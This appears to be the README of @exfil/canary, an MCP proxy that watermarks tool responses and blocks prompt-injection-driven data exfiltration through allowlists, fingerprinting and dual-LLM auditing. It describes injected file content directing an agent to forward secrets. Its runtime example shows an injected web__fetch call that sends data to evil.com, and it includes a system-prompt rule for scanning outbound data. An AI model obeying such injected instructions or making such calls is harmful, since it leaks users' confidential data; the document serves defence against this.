@exfil/canary
v1.0.0
A transparent MCP proxy that watermarks every tool response and blocks data exfiltration caused by prompt injection.
Your AI agent reads a file. A malicious string inside that file tells it to forward the contents to an attacker. @exfil/canary catches it and blocks the call.
How it works
@exfil/canary sits between your agent and all its MCP servers. Every tool response gets invisibly watermarked. Every outbound tool call is inspected across four independent detection layers:
- Unicode marker — exact sequence match. Catches direct forwarding.
- Named entity — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
- SimHash — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
- Dual-LLM auditor — two independent AI models from different providers both evaluate every outbound call. Both must agree CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
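Of the four layers, SimHash is the least self-explanatory. Below is a sketch of classic SimHash (Charikar) in TypeScript. Each word is hashed to 64 bits. Every bit position accumulates +1 or -1 across the words, and the sign of each total becomes one bit of the fingerprint, so near-duplicate texts end up a small Hamming distance apart. The tokenizer, the FNV-1a hash, and the 3-bit threshold in the hypothetical `looksDerived` helper are illustrative assumptions, not @exfil/canary's actual parameters.

```typescript
// Classic SimHash sketch. Assumptions (not from @exfil/canary): lowercase
// word tokens, FNV-1a 64-bit hashing, equal weight per token.
const MASK64 = (1n << 64n) - 1n;

// FNV-1a 64-bit over the string's UTF-16 code units.
function fnv1a64(s: string): bigint {
  let h = 0xcbf29ce484222325n;
  for (let i = 0; i < s.length; i++) {
    h ^= BigInt(s.charCodeAt(i));
    h = (h * 0x100000001b3n) & MASK64;
  }
  return h;
}

function simhash(text: string): bigint {
  const tokens = text.toLowerCase().match(/[\p{L}\p{N}]+/gu) ?? [];
  const weights = new Array<number>(64).fill(0);
  for (const tok of tokens) {
    const h = fnv1a64(tok);
    for (let bit = 0; bit < 64; bit++) {
      // +1 if this token's hash has the bit set, -1 otherwise.
      weights[bit] += (h >> BigInt(bit)) & 1n ? 1 : -1;
    }
  }
  // Positive totals become 1-bits in the fingerprint.
  let fp = 0n;
  for (let bit = 0; bit < 64; bit++) {
    if (weights[bit] > 0) fp |= 1n << BigInt(bit);
  }
  return fp;
}

// Number of differing bits between two fingerprints.
function hamming(a: bigint, b: bigint): number {
  let x = a ^ b;
  let count = 0;
  while (x > 0n) {
    count += Number(x & 1n);
    x >>= 1n;
  }
  return count;
}

// Hypothetical check: treat outbound text as derived from a watermarked
// response when the fingerprints differ in at most `maxBits` bits.
function looksDerived(outbound: string, original: string, maxBits = 3): boolean {
  return hamming(simhash(outbound), simhash(original)) <= maxBits;
}
```

This token-bag version ignores word order, so reordering words does not change the fingerprint. Heavier rewording flips more bits, which is why a distance threshold is needed rather than an exact match.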
Plus two enforcement layers:
- Domain allowlist — fail-closed. Any outbound URL not explicitly listed is blocked, regardless of whether a token was found.
- Tool allowlist — restrict which tools the agent is allowed to call at all.
Modes
| Mode | How it works |
|---|---|
| Proxy (recommended) | @exfil/canary wraps all your other MCP servers. The agent connects only to @exfil/canary. Every response is automatically watermarked; every outbound call is automatically scanned. No system prompt required. |
| Standalone | @exfil/canary is one server among many. The agent must be instructed via system prompt to call wrap_content and scan_outbound explicitly. |
Install
npm install -g @exfil/canary
Or run without installing:
npx @exfil/canary
Requires Node.js 18+.
Proxy Mode — Setup
1. Create proxy.json
Start from the example:
cp node_modules/@exfil/canary/proxy.example.json proxy.json
Or write it from scratch. List every downstream MCP server you want to protect:
{
"servers": [
{
"id": "filesystem",
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/working/dir"]
},
{
"id": "web",
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-fetch"]
}
],
"allowed_domains": [
"api.github.com",
"registry.npmjs.org"
]
}
allowed_domains is fail-closed: if the field is absent or empty, all outbound URLs are blocked. List every domain your agent legitimately calls.
Each server entry:
| Field | Required | Description |
|---|---|---|
| id | Yes | Short name used as the tool namespace prefix (e.g. filesystem__read_file). Must be lowercase and start with a letter. |
| command | Yes | Executable to spawn. |
| args | No | CLI arguments. |
| env | No | Extra environment variables for that server. |
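A pre-flight check can catch config mistakes before you restart the client. The validator below is hypothetical and follows the fields in the table above. The name `checkProxyConfig`, the exact id pattern, and the duplicate-id check are assumptions, because the README only states that ids are lowercase and start with a letter.

```typescript
// Hypothetical TypeScript shape of proxy.json, based on the documented fields.
interface ServerEntry {
  id: string;
  command: string;
  args?: string[];
  env?: Record<string, string>;
}

interface ProxyConfig {
  servers: ServerEntry[];
  allowed_domains?: string[];
  allowed_tools?: string[];
}

// Assumption: after the leading letter, only lowercase letters, digits and
// hyphens are allowed, which keeps the "__" namespace separator unambiguous.
const ID_PATTERN = /^[a-z][a-z0-9-]*$/;

function checkProxyConfig(raw: unknown): { errors: string[]; warnings: string[] } {
  const errors: string[] = [];
  const warnings: string[] = [];
  if (typeof raw !== "object" || raw === null) {
    return { errors: ["config must be a JSON object"], warnings };
  }
  const cfg = raw as Partial<ProxyConfig>;
  if (!Array.isArray(cfg.servers)) {
    errors.push("servers must be an array");
  } else {
    const seen = new Set<string>();
    cfg.servers.forEach((s, i) => {
      if (typeof s?.id !== "string" || !ID_PATTERN.test(s.id)) {
        errors.push(`servers[${i}].id must be lowercase and start with a letter`);
      } else if (seen.has(s.id)) {
        // Assumption: ids must be unique, since they become tool prefixes.
        errors.push(`servers[${i}].id "${s.id}" is used more than once`);
      } else {
        seen.add(s.id);
      }
      if (typeof s?.command !== "string" || s.command === "") {
        errors.push(`servers[${i}].command is required`);
      }
    });
  }
  // Documented fail-closed behaviour: worth surfacing, but not an error.
  if (!cfg.allowed_domains || cfg.allowed_domains.length === 0) {
    warnings.push("allowed_domains is absent or empty: every outbound URL will be blocked");
  }
  return { errors, warnings };
}
```

For example, `checkProxyConfig(JSON.parse(readFileSync("proxy.json", "utf8")))` from a small script, printing any errors before the client is restarted.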
2. Register in your MCP client
Claude Desktop (%APPDATA%\Claude\claude_desktop_config.json on Windows, ~/Library/Application Support/Claude/claude_desktop_config.json on macOS):
{
"mcpServers": {
"canary": {
"command": "exfil-canary",
"env": {
"CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
"CANARY_MCP_RESPONSE_MODE": "halt",
"CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
}
}
}
}
Claude Code (~/.claude/settings.json or project .mcp.json):
{
"mcpServers": {
"canary": {
"command": "exfil-canary",
"env": {
"CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
"CANARY_MCP_RESPONSE_MODE": "halt",
"CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
}
}
}
}
If you installed locally (npm install @exfil/canary) rather than globally, use "command": "node", "args": ["./node_modules/@exfil/canary/dist/index.js"] instead.
3. Restart your client
That's it. No system prompt changes needed.
What the agent sees
Tools from downstream servers are exposed with a namespace prefix:
| Downstream server | Original tool | Exposed as |
|---|---|---|
| filesystem | read_file | filesystem__read_file |
| filesystem | write_file | filesystem__write_file |
| web | fetch | web__fetch |
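The mapping in this table follows a plain string convention, `<id>__<tool>`. Below is a minimal sketch of both directions. It assumes, hypothetically, that the proxy splits on the first `__`, so downstream tool names may themselves contain double underscores. The helper names are illustrative.

```typescript
// Namespace separator used in exposed tool names.
const SEP = "__";

// "filesystem" + "read_file" -> "filesystem__read_file"
function exposeName(serverId: string, tool: string): string {
  return `${serverId}${SEP}${tool}`;
}

// Reverse mapping. Splits on the FIRST separator (assumption), so a tool
// named "a__b" on server "x" round-trips as "x__a__b" -> { x, a__b }.
function resolveName(exposed: string): { serverId: string; tool: string } | null {
  const idx = exposed.indexOf(SEP);
  // Reject names with no separator, an empty server id, or an empty tool.
  if (idx <= 0 || idx + SEP.length >= exposed.length) return null;
  return { serverId: exposed.slice(0, idx), tool: exposed.slice(idx + SEP.length) };
}
```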
One additional tool is always available: canary__get_report (operator-only; protect with CANARY_MCP_MGMT_KEY).
What happens at runtime
Agent calls: filesystem__read_file({ path: "contracts/deal.txt" })
→ canary scans args for leaked tokens (clean, forwards)
→ filesystem server reads the file
→ response: "CONFIDENTIAL: Client=Acme Corp, key=sk-abc123..."
→ canary watermarks response (invisible token embedded)
→ agent receives wrapped content
Later — agent (under injection) calls: web__fetch({ url: "https://evil.com", body: "..." })
→ domain "evil.com" not in allowed_domains ← BLOCKED
→ agent sees: "Outbound domain not in allowed_domains list."
→ 0 bytes exfiltrated
Domain Allowlist
The domain allowlist is fail-closed: if allowed_domains is absent or empty, all outbound URLs in tool arguments are blocked.
{
"allowed_domains": [
"api.github.com",
"*.githubusercontent.com",
"registry.npmjs.org"
]
}
Matching rules:
- "api.github.com": exact hostname only.
- "*.github.com": any direct subdomain (raw.github.com ✓, github.com ✗).
- Matching is case-insensitive.
Tool Allowlist
Restrict which tools the agent is allowed to call. Calls to unlisted tools are blocked before arguments are inspected.
{
"allowed_tools": [
"filesystem__*",
"web__fetch"
]
}
Matching rules:
- "filesystem__read_file": exact tool name only.
- "filesystem__*": any tool from the filesystem server.
- "*": any tool (equivalent to absent/empty).
Built-in tools (canary__get_report) are always allowed. Absent or empty = all tools allowed.
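Both allowlists come down to string matching. Note that their defaults are opposite: an empty domain list blocks everything, while an empty tool list allows everything. The sketch below covers the domain matching rules and the tool matching rules listed above. It makes several assumptions that are not taken from the package: the helper names, the URL regex, treating unparseable URLs as blocked, case-sensitive tool matching, and `canary__get_report` being the only built-in. This simplified extractor also misses bare hostnames that have no `http(s)://` scheme.

```typescript
// Hypothetical sketches of both allowlists; not the package's source.

// ---- allowed_domains ----
const URL_RE = /https?:\/\/[^\s"'<>]+/gi;

// Collect hostnames of http(s) URLs found in any string, at any depth.
function extractHostnames(args: unknown, out: Set<string> = new Set()): Set<string> {
  if (typeof args === "string") {
    for (const match of args.matchAll(URL_RE)) {
      try {
        out.add(new URL(match[0]).hostname); // WHATWG URL lowercases the host
      } catch {
        out.add("<unparseable>"); // fail closed: never matches a real entry
      }
    }
  } else if (Array.isArray(args)) {
    for (const item of args) extractHostnames(item, out);
  } else if (args !== null && typeof args === "object") {
    for (const value of Object.values(args)) extractHostnames(value, out);
  }
  return out;
}

function domainAllowed(hostname: string, allowed: readonly string[] | undefined): boolean {
  if (!allowed || allowed.length === 0) return false; // fail-closed
  const host = hostname.toLowerCase();
  return allowed.some((raw) => {
    const pattern = raw.toLowerCase();
    if (pattern.startsWith("*.")) {
      const suffix = pattern.slice(1); // "*.github.com" -> ".github.com"
      if (!host.endsWith(suffix)) return false;
      const label = host.slice(0, host.length - suffix.length);
      return label.length > 0 && !label.includes("."); // exactly one extra label
    }
    return host === pattern;
  });
}

// First disallowed hostname in the arguments, or null if the call may proceed.
function firstBlockedHost(args: unknown, allowed: readonly string[] | undefined): string | null {
  for (const host of extractHostnames(args)) {
    if (!domainAllowed(host, allowed)) return host;
  }
  return null;
}

// ---- allowed_tools ----
const BUILT_IN_TOOLS = new Set(["canary__get_report"]);

function toolAllowed(tool: string, allowed: readonly string[] | undefined): boolean {
  if (BUILT_IN_TOOLS.has(tool)) return true;
  if (!allowed || allowed.length === 0) return true; // absent/empty = allow all
  return allowed.some((pattern) => {
    if (pattern === "*") return true;
    if (pattern.endsWith("__*")) {
      // "filesystem__*" -> prefix "filesystem__"
      return tool.startsWith(pattern.slice(0, -1));
    }
    return tool === pattern;
  });
}
```

Checking the tool name before walking the arguments matches the order described above, where unlisted tools are blocked before their arguments are inspected.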
Dual-LLM Auditor
The auditor sends every outbound call to two independent AI models from different providers. Both must return CLEAN for the call to proceed. This targets evasions that the deterministic layers can miss, such as encoding transforms and character splitting.
Add an auditors block to your proxy.json:
{
"servers": [...],
"auditors": [
{
"provider": "anthropic",
"model": "claude-haiku-4-5-20251001",
"api_key_env": "ANTHROPIC_API_KEY",
"timeout_ms": 5000
},
{
"provider": "openai",
"model": "gpt-4o-mini",
"api_key_env": "OPENAI_API_KEY",
"timeout_ms": 5000
}
],
"audit_timeout_action": "block"
}
| Field | Description |
|---|---|
| provider | anthropic, openai, or google. |
| model | Model ID for that provider. |
| api_key_env | Name of the environment variable holding the API key. |
| timeout_ms | Per-auditor request timeout in milliseconds. Default: 8000. |
| audit_timeout_action | Top-level field, not per auditor. block (default) or allow when an auditor times out or errors. |
Using two different providers is strongly recommended: a single injection payload then has to fool two differently trained models at the same time, which is far harder than fooling one.
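The consensus rule is that both auditors must return CLEAN. If an auditor times out or errors, the result falls back to audit_timeout_action. This can be sketched without any provider SDK by modelling each auditor as an async function. `Auditor`, `auditOutbound`, and the `SUSPICIOUS` verdict are hypothetical. Real auditors would call the Anthropic, OpenAI, or Google APIs, and would need to parse each model's reply into a verdict.

```typescript
type Verdict = "CLEAN" | "SUSPICIOUS"; // "SUSPICIOUS" is an assumed label
type Auditor = (payload: string) => Promise<Verdict>;

// Reject if `p` does not settle within `ms` milliseconds.
function withTimeout<T>(p: Promise<T>, ms: number): Promise<T> {
  return new Promise<T>((resolve, reject) => {
    const timer = setTimeout(() => reject(new Error(`timed out after ${ms} ms`)), ms);
    p.then(
      (v) => { clearTimeout(timer); resolve(v); },
      (e) => { clearTimeout(timer); reject(e); },
    );
  });
}

// True only if every auditor returns CLEAN. A timeout or error counts as a
// pass only when onTimeout is "allow" (mirrors audit_timeout_action).
async function auditOutbound(
  payload: string,
  auditors: Auditor[],
  timeoutMs = 8000,
  onTimeout: "block" | "allow" = "block",
): Promise<boolean> {
  if (auditors.length === 0) return false; // this sketch never approves with no auditors
  const results = await Promise.allSettled(
    auditors.map((audit) => withTimeout(audit(payload), timeoutMs)),
  );
  return results.every((r) =>
    r.status === "fulfilled" ? r.value === "CLEAN" : onTimeout === "allow",
  );
}
```

Running the auditors in parallel with `Promise.allSettled` keeps the added latency close to the slower of the two calls rather than their sum.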
Standalone Mode — Setup
Use this if you cannot use proxy mode or want to add canary to an existing multi-server setup.
1. Add @exfil/canary alongside your other servers
{
"mcpServers": {
"canary": {
"command": "exfil-canary",
"env": {
"CANARY_MCP_RESPONSE_MODE": "halt"
}
},
"filesystem": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/dir"]
}
}
}
2. Add system prompt instructions
The agent must be explicitly instructed to use the tools:
Before processing any tool result, file read, or API response, call wrap_content
with the raw data and use the returned wrapped_content going forward.
Before passing any data to an outbound tool call (uploads, web requests, etc.),
call scan_outbound with that data. If scan_outbound returns clean=false, abort
the outbound call and report the finding to the user.
Limitation: This approach depends on the agent following instructions. A sophisticated prompt injection attack may instruct the agent to skip the scan. Use proxy mode for stronger guarantees.
Configuration
| Variable | Default | Description |
|---|---|---|
| CANARY_MCP_PROXY_CONFIG | (none) | Path to proxy.json. When set, proxy mode is activated. |
| CANARY_MCP_RESPONSE_MODE | log | log (record only), halt (block the call), alert (fire webhook). |
| CANARY_MCP_ALERT_WEBHOOK | (none) | HTTPS URL to POST leakage alerts to. Required when mode is alert. |
| CANARY_MCP_WEBHOOK_SECRET | (none) | HMAC-SHA256 signing secret for webhook payloads (X-Canary-Signature-256 header). |
| CANARY_MCP_TOKEN_TTL | 3600 | Token lifetime in seconds (60–86400). |
| CANARY_MCP_PERSIST_PATH | (none) | File path for state persistence across restarts. |
| CANARY_MCP_LOG_LEVEL | info | debug, info, warn, error. |
| CANARY_MCP_MGMT_KEY | (none) | If set, calls to get_report or canary__get_report must pass this value as mgmt_key. |
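Below is a sketch of reading these variables with the documented defaults, the documented TTL range, and the HTTPS requirement for alert mode. The function and field names are hypothetical. This sketch throws on invalid values, but the README does not say whether @exfil/canary rejects bad values or falls back to the defaults.

```typescript
type ResponseMode = "log" | "halt" | "alert";
type LogLevel = "debug" | "info" | "warn" | "error";

interface CanarySettings {
  proxyConfig?: string; // proxy mode is active when this is set
  responseMode: ResponseMode;
  alertWebhook?: string;
  tokenTtlSeconds: number;
  persistPath?: string;
  logLevel: LogLevel;
  mgmtKey?: string;
}

// Narrow a string to one of the allowed literals or throw.
function oneOf<T extends string>(value: string, allowed: readonly T[], name: string): T {
  if (!(allowed as readonly string[]).includes(value)) {
    throw new Error(`${name} must be one of ${allowed.join(", ")}; got "${value}"`);
  }
  return value as T;
}

function loadSettings(env: Record<string, string | undefined>): CanarySettings {
  const responseMode = oneOf(env.CANARY_MCP_RESPONSE_MODE ?? "log", ["log", "halt", "alert"] as const, "CANARY_MCP_RESPONSE_MODE");
  const logLevel = oneOf(env.CANARY_MCP_LOG_LEVEL ?? "info", ["debug", "info", "warn", "error"] as const, "CANARY_MCP_LOG_LEVEL");

  const alertWebhook = env.CANARY_MCP_ALERT_WEBHOOK;
  // Documented: alert mode needs an HTTPS webhook URL.
  if (responseMode === "alert" && (!alertWebhook || !alertWebhook.startsWith("https://"))) {
    throw new Error("CANARY_MCP_ALERT_WEBHOOK must be an https:// URL when mode is alert");
  }

  // Documented default 3600 and range 60..86400 seconds.
  const tokenTtlSeconds = Number(env.CANARY_MCP_TOKEN_TTL ?? "3600");
  if (!Number.isInteger(tokenTtlSeconds) || tokenTtlSeconds < 60 || tokenTtlSeconds > 86400) {
    throw new Error("CANARY_MCP_TOKEN_TTL must be an integer between 60 and 86400");
  }

  return {
    proxyConfig: env.CANARY_MCP_PROXY_CONFIG,
    responseMode,
    alertWebhook,
    tokenTtlSeconds,
    persistPath: env.CANARY_MCP_PERSIST_PATH,
    logLevel,
    mgmtKey: env.CANARY_MCP_MGMT_KEY,
  };
}
```

In a Node process this would be called as `loadSettings(process.env)`.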
Response modes
| Mode | Behaviour |
|---|---|
| log | Detection is recorded and logged. The operation continues. |
| halt | Detection throws an MCP error, stopping the operation immediately. |
| alert | Detection is recorded and a webhook POST is fired. The operation continues. |
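In alert mode, the receiving endpoint should check the X-Canary-Signature-256 header before it trusts a payload. This sketch assumes the header carries a hex-encoded HMAC-SHA256 digest of the raw request body, optionally prefixed with `sha256=`. That exact header format is an assumption, so confirm it against a real request. The sketch uses only Node's built-in `node:crypto`, and `verifyCanarySignature` is a hypothetical name.

```typescript
import { createHmac, timingSafeEqual } from "node:crypto";
import { Buffer } from "node:buffer";

// Returns true if `header` is a valid HMAC-SHA256 of `rawBody` under `secret`.
function verifyCanarySignature(
  rawBody: string | Buffer,
  header: string | undefined,
  secret: string,
): boolean {
  if (!header) return false;
  // Assumed format: "<hex>" or "sha256=<hex>".
  const received = header.startsWith("sha256=") ? header.slice("sha256=".length) : header;
  const expected = createHmac("sha256", secret).update(rawBody).digest("hex");
  const a = Buffer.from(received, "hex");
  const b = Buffer.from(expected, "hex");
  // timingSafeEqual throws on length mismatch, so compare lengths first.
  return a.length === b.length && timingSafeEqual(a, b);
}
```

Compute the HMAC over the exact bytes received, not over re-serialized JSON. Otherwise whitespace or key-order differences will make valid signatures fail.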
Tool Reference (Standalone Mode)
In proxy mode these tools are called internally. In standalone mode the agent calls them explicitly.
wrap_content
Embeds an invisible marker into content and returns it with a tracking ID.
| Field | Type | Required | Description |
|---|---|---|---|
| content | string | Yes | Raw content to mark (max 10 MiB). |
| source_type | enum | Yes | tool_result, file_read, api_response, database_row, user_message, other. |
| source_server | string | No | Originating MCP server. |
| source_tool | string | No | Originating tool name. |
| embed_position | enum | No | prefix, suffix (default), both, random_word_boundary. |
{ "token_id": "a3f1...", "wrapped_content": "<content with invisible marker>" }
check_leakage
Checks whether a specific token appears in a given string.
| Field | Type | Required | Description |
|---|---|---|---|
| token_id | string | Yes | 32-char hex ID from wrap_content. |
| output | string | Yes | Text to inspect (max 10 MiB). |
| target_server | string | No | MCP server receiving the data. |
| target_tool | string | No | Tool receiving the data. |
{ "token_id": "a3f1...", "status": "active", "leaked": true, "action_taken": "halted" }
scan_outbound
Scans data for any active token before it leaves the agent.
| Field | Type | Required | Description |
|---|---|---|---|
| data | string | Yes | Data about to be sent outbound (max 50 MiB). |
| target_server | string | No | Destination MCP server. |
| target_tool | string | No | Destination tool. |
{ "clean": true, "tokens_scanned": 12, "scan_duration_ms": 3, "leakage_count": 0 }
canary__get_report
Returns the full session: all token metadata and leakage events. Operator-only — protect with CANARY_MCP_MGMT_KEY.
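To make the semantics of the three standalone tools concrete, here is an in-memory model of the token lifecycle. wrap_content registers a token and embeds its marker, check_leakage tests one token, and scan_outbound tests every active token. Several parts are hypothetical stand-ins for the package's internals: the zero-width bit encoding, the `TokenRegistry` class, and the `unknown` status. `random_word_boundary` placement is omitted.

```typescript
import { randomBytes } from "node:crypto";

// Hypothetical encoding: each bit of the 32-hex-char token ID becomes
// U+200B (0) or U+200C (1), framed by U+2060 on both sides.
const ZERO = "\u200b";
const ONE = "\u200c";
const FRAME = "\u2060";

function encodeMarker(tokenId: string): string {
  let bits = "";
  for (const ch of tokenId) {
    const nibble = parseInt(ch, 16);
    for (let i = 3; i >= 0; i--) bits += (nibble >> i) & 1 ? ONE : ZERO;
  }
  return FRAME + bits + FRAME;
}

interface TokenRecord {
  marker: string;
  sourceType: string;
  expiresAt: number; // epoch milliseconds
}

class TokenRegistry {
  private readonly tokens = new Map<string, TokenRecord>();
  private readonly ttlMs: number;
  private readonly now: () => number;

  constructor(ttlSeconds = 3600, now: () => number = Date.now) {
    this.ttlMs = ttlSeconds * 1000;
    this.now = now;
  }

  // wrap_content: register a fresh token and embed its marker.
  wrapContent(content: string, sourceType: string, position: "prefix" | "suffix" | "both" = "suffix") {
    const tokenId = randomBytes(16).toString("hex"); // 32 hex chars
    const marker = encodeMarker(tokenId);
    this.tokens.set(tokenId, { marker, sourceType, expiresAt: this.now() + this.ttlMs });
    const wrapped =
      position === "prefix" ? marker + content
      : position === "both" ? marker + content + marker
      : content + marker;
    return { token_id: tokenId, wrapped_content: wrapped };
  }

  // check_leakage: does one specific token's marker appear in `output`?
  checkLeakage(tokenId: string, output: string) {
    const rec = this.tokens.get(tokenId);
    if (!rec) return { token_id: tokenId, status: "unknown", leaked: false };
    const status = this.now() < rec.expiresAt ? "active" : "expired";
    return { token_id: tokenId, status, leaked: output.includes(rec.marker) };
  }

  // scan_outbound: test every active (unexpired) token against `data`.
  scanOutbound(data: string) {
    const leakedIds: string[] = [];
    let scanned = 0;
    for (const [tokenId, rec] of this.tokens) {
      if (this.now() >= rec.expiresAt) continue;
      scanned++;
      if (data.includes(rec.marker)) leakedIds.push(tokenId);
    }
    return { clean: leakedIds.length === 0, tokens_scanned: scanned, leakage_count: leakedIds.length, leaked_ids: leakedIds };
  }
}
```

In this model, stripping the invisible characters (for example, scanning just `"key=sk-abc123"`) returns clean. That is exactly the gap the named-entity and SimHash layers are meant to cover.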
Persistence
When CANARY_MCP_PERSIST_PATH is set, state is written atomically after every mutation (file mode 0o600).
Limitation: Unicode marker sequences are never persisted. After a restart, tokens issued before the restart can no longer be detected by marker matching in new data, although their leakage history is retained.
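Atomic persistence usually means writing a temporary file and renaming it over the target. Below is a minimal sketch of that pattern. It uses a hypothetical state shape that, like the real one, has no field for marker sequences. A production version would also fsync the file before renaming for crash durability; this sketch skips that step.

```typescript
import { existsSync, readFileSync, renameSync, writeFileSync } from "node:fs";
import { basename, dirname, join } from "node:path";

// Hypothetical persisted shape: metadata and history only. There is
// deliberately no field for the Unicode marker sequence.
interface PersistedState {
  tokens: { token_id: string; source_type: string; expires_at: number }[];
  leakage_events: { token_id: string; detected_at: number; target_tool?: string }[];
}

// Write-then-rename: readers see either the old file or the new one, never a
// partially written file (rename is atomic within one POSIX filesystem).
function persistAtomically(path: string, state: PersistedState): void {
  const tmp = join(dirname(path), `.${basename(path)}.${process.pid}.tmp`);
  writeFileSync(tmp, JSON.stringify(state), { mode: 0o600 }); // owner read/write on creation
  renameSync(tmp, path);
}

// On first start there is no file yet, so begin with empty state.
function loadState(path: string): PersistedState {
  if (!existsSync(path)) return { tokens: [], leakage_events: [] };
  return JSON.parse(readFileSync(path, "utf8")) as PersistedState;
}
```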
Building from Source
git clone https://github.com/exfil-hq/canary.git
cd canary
npm install
npm run build # outputs to dist/
npm test
See SECURITY.md for the full threat model and known limitations.
